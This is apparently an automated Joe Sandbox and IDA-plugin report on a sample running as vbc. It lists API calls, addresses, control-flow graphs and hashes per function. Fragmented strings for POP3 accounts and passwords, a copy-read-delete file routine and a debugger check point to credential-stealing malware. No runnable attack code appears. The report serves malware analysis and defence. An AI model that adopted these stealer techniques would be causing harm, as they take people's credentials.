                                                                                                                                                                                      control_flow_graph 149 10001eec-10001ef5 150 10001ef7-10001efa 149->150 151 10001f2a-10001f35 dllmain_crt_process_detach 149->151 153 10001f1c-10001f28 dllmain_crt_process_attach 150->153 154 10001efc-10001eff 150->154 152 10001f3a 151->152 155 10001f3b-10001f3c 152->155 153->152 156 10001f01-10001f04 154->156 157 10001f12 call 100023ec 154->157 159 10001f06-10001f09 156->159 160 10001f0b-10001f10 call 1000240b 156->160 161 10001f17-10001f1a 157->161 159->155 160->161 161->155
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                      • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3750050125-0
                                                                                                                                                                                      • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                      • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                      • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                      • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                      • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                      • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                      • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 277 1000173a-100017fe call 1000c030 call 10002c40 * 2 284 10001803 call 10001cca 277->284 285 10001808-1000180c 284->285 286 10001812-10001816 285->286 287 100019ad-100019b1 285->287 286->287 288 1000181c-10001837 call 10001ede 286->288 291 1000183d-10001845 288->291 292 1000199f-100019ac call 10001ee7 * 2 288->292 293 10001982-10001985 291->293 294 1000184b-1000184e 291->294 292->287 296 10001995-10001999 293->296 297 10001987 293->297 294->293 298 10001854-10001881 call 100044b0 * 2 call 10001db7 294->298 296->291 296->292 300 1000198a-1000198d call 10002c40 297->300 311 10001887-1000189f call 100044b0 call 10001db7 298->311 312 1000193d-10001943 298->312 306 10001992 300->306 306->296 311->312 326 100018a5-100018a8 311->326 314 10001945-10001947 312->314 315 1000197e-10001980 312->315 314->315 317 10001949-1000194b 314->317 315->300 319 10001961-1000197c call 100016aa 317->319 320 1000194d-1000194f 317->320 319->306 323 10001951-10001953 320->323 324 10001955-10001957 320->324 323->319 323->324 327 10001959-1000195b 324->327 328 1000195d-1000195f 324->328 329 100018c4-100018dc call 100044b0 call 10001db7 326->329 330 100018aa-100018c2 call 100044b0 call 10001db7 326->330 327->319 327->328 328->315 328->319 329->296 339 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 329->339 330->329 330->339 339->296
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                        • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                        • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                      • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                      • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                      • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                                      • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                                      • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                      • API String ID: 3296212668-3023110444
                                                                                                                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                      • API String ID: 4218353326-230879103
                                                                                                                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                      • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                      • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                      • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                      • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                      • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                      • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                      • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                      • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                      • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                      • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                      • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                      • _free.LIBCMT ref: 10009315
                                                                                                                                                                                      • _free.LIBCMT ref: 10009320
                                                                                                                                                                                      • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                      • _free.LIBCMT ref: 10009336
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A08
